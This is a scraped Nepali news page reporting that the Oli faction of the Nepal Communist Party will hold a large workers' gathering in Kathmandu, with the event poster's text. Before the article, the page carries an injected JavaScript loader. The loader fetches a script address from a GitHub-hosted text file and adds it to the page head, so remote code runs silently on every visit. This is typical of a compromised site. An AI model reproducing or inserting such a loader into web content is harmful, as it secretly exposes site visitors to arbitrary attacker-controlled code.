;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); शनिबार ओली समूहले काठमाडौंमा बृहत कार्यकर्ता भेला गर्दै – जुनेली न्युज
मङ्लबार, असार ११, २०८२
  • होमपेज
  • शनिबार ओली समूहले काठमाडौंमा बृहत कार्यकर्ता भेला गर्दै
देश/प्रदेश

शनिबार ओली समूहले काठमाडौंमा बृहत कार्यकर्ता भेला गर्दै

पुष १५,

काठमाडौं । नेपाल कम्युनिष्ट पार्टी (नेकपा) ओली समूहले बृहत कार्यकर्ता भेला गर्ने भएको छ ।

शनिबार १८ गते काठमाडौंको प्रज्ञा प्रतिष्ठान, कमलादीमा दिउसो १ बजे बृहत भेला आयोजना गरेको नेता रामबहादुर थापा बादलले बताएका छन् ।

भेलालाई प्रधानमन्त्री समेत रहेका पार्टी अध्यक्ष कपी शर्मा ओली,  नेताहरु रामबहादुर थापा बादल, ईश्वर पेखरेल र कृष्ण गोपाल श्रेष्ठले सम्बोधन गर्ने कार्यक्रम रहेको उनले जानकारी दिए । Image may contain: 4 people, text that says 'J नेपाल कम्युनिष्ट पार्टी (नेकपा) काठमाडौं जिल्ला कमिटीद्वारा आयोजित बृहत कार्यकर्ता भेला बक्ताहरु रामवहादर बादल" RRSFETOE इुंश्वर पोखरेल कष्णगोपाल भ्रेष्ठ २०७७ पौष १६ गते शनिवार दिनको ৭ बजे प्रमुख अतिथि: क केपी शर्मा ओली स्थान: प्रज्ञा प्रतिष्ठान, कमलादी, काठमाडौं'

फेसबुक प्रतिक्रियाहरु